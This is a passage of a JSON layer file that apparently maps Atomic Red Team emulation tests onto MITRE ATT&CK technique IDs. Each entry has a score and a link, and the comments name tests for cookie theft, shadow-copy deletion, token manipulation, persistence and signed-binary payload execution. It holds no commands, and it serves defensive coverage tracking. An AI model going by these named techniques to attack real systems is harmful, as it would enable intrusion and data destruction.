Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View 